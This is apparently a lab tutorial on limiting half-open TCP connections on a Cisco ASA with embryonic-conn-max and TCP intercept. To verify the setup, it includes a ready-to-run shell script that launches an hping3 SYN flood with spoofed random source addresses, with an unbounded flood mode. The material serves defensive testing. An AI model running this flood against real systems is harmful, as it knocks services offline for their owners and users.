An attacker can launch a denial-of-service (DoS) attack by flooding a host with thousands of TCP SYN packets whose source addresses are spoofed. The host answers each SYN with a SYN-ACK that is never acknowledged, so every SYN leaves a half-open (embryonic) TCP connection that holds state on the host until it times out. Enough of them exhaust the host's connection table, and legitimate packets are dropped.
On a Cisco ASA firewall, the Modular Policy Framework (MPF) can cap the number of half-open connections allowed to a server with the set connection embryonic-conn-max option (the default of 0 means unlimited). Once the limit is reached the ASA applies TCP intercept to that traffic: it answers new SYNs with a SYN-ACK on the server's behalf and only opens a connection to the server once the client completes the three-way handshake, so spoofed SYNs that are never acknowledged are absorbed by the firewall rather than by the server.
This post walks through the configuration used to limit half-open connections and then shows it working against a SYN flood generated with the hping3 tool.
Define Access Control List
access-list INTCPT_SVR01 permit tcp any host 192.168.10.5 eq 80
Create Class Map
class-map CM_INTCPT_SVR01
 match access-list INTCPT_SVR01
Create Policy Map
policy-map PM_INTCPT_SVR01
 class CM_INTCPT_SVR01
  set connection embryonic-conn-max 40
Assign to Service Policy
service-policy PM_INTCPT_SVR01 interface OUTSIDE
Verification
Using hping3 (packaged for most Linux distributions), send a SYN flood at the target host. In this lab the target is 1.1.1.10 on port 8080, which the ASA NATs to the real address 192.168.10.5 on port 80; that is why the access list above matches the real address, since ASA 8.3 and later evaluate access lists against untranslated addresses. Use the --rand-source option so that every SYN carries a different, spoofed source address: none of the SYN-ACKs is ever answered, which is exactly what leaves the connections half-open. Because the sources are random, a per-client limit (per-client-embryonic-max) would never trigger, so the aggregate embryonic-conn-max is the right control here.
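The hping3 invocation the post describes, as an added example that is not part of the original post. It assumes hping3 is installed and the script runs as root (raw sockets are required); the target address and port are the post's lab values and can be overridden through the environment. By default it only prints the command so it can be reviewed; pass run to launch the flood.

```shell
#!/bin/sh
# Added example (not from the original post): drive the hping3 SYN flood the
# post describes against the lab's NAT'd address 1.1.1.10:8080.
# Assumptions: hping3 is installed and you are root (raw sockets are required);
# the lab addresses are the post's, overridable through the environment.

TARGET="${TARGET:-1.1.1.10}"   # mapped (outside) address of the web server
PORT="${PORT:-8080}"           # mapped port, NAT'd to 192.168.10.5:80
COUNT="${COUNT:-500}"          # SYNs to send; 0 means --flood (unbounded)

# Build the hping3 command line so it can be reviewed before it is run.
#   -S             SYN flag only: the client never completes the handshake
#   -p PORT        destination port
#   --rand-source  spoof a random source on every packet, so the SYN-ACK goes
#                  nowhere and each attempt stays embryonic on the server
#   -c N / --flood bounded burst, or as fast as possible until Ctrl-C
syn_flood_cmd() {
    target="$1"
    port="$2"
    count="${3:-0}"
    if [ "$count" -gt 0 ] 2>/dev/null; then
        printf 'hping3 -S -p %s --rand-source -c %s %s' "$port" "$count" "$target"
    else
        printf 'hping3 -S -p %s --rand-source --flood %s' "$port" "$target"
    fi
}

# Preflight: hping3 present and running as root. Returns 0 when it is safe to
# launch, 1 otherwise, so the caller stops cleanly instead of failing half-way.
preflight() {
    if ! command -v hping3 >/dev/null 2>&1; then
        echo "hping3 not installed (Debian/Ubuntu: apt-get install hping3)" >&2
        return 1
    fi
    if [ "$(id -u)" -ne 0 ]; then
        echo "hping3 needs raw sockets: run as root" >&2
        return 1
    fi
    return 0
}

# Launch the flood. Embryonic connections counted by the ASA climb until
# embryonic-conn-max (40 in the post) is reached, after which TCP intercept
# answers further SYNs itself and the server sees no new half-open sessions.
syn_flood() {
    cmd=$(syn_flood_cmd "$TARGET" "$PORT" "$COUNT")
    preflight || return 1
    echo "+ $cmd" >&2
    eval "$cmd"
}

case "${1:-show}" in
    show) syn_flood_cmd "$TARGET" "$PORT" "$COUNT"; echo ;;
    run)  syn_flood ;;
    *)    echo "usage: $0 [show|run]" >&2; exit 2 ;;
esac
```

With COUNT=0 the script uses --flood, which sends as fast as the lab host can and keeps going until interrupted with Ctrl-C; a bounded count is enough to push the embryonic counter to the limit and is easier to correlate with the ASA counters. Note that random spoofed sources can include addresses the ASA's reverse-path check (if ip verify reverse-path is enabled on OUTSIDE) or an upstream router would discard, so run the flood from a host on the OUTSIDE segment.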
On the ASA, run show service-policy interface OUTSIDE: under the class it reports the connection policy in force, the current number of embryonic connections and the number of connections dropped. During the flood the embryonic count should rise to the configured limit of 40 and then hold there while the drop counter keeps climbing.
If logging is enabled on the ASA, you should also see syslog messages reporting that the embryonic connection limit has been exceeded (message ID 201010) for the SYNs that arrive once the limit has been reached.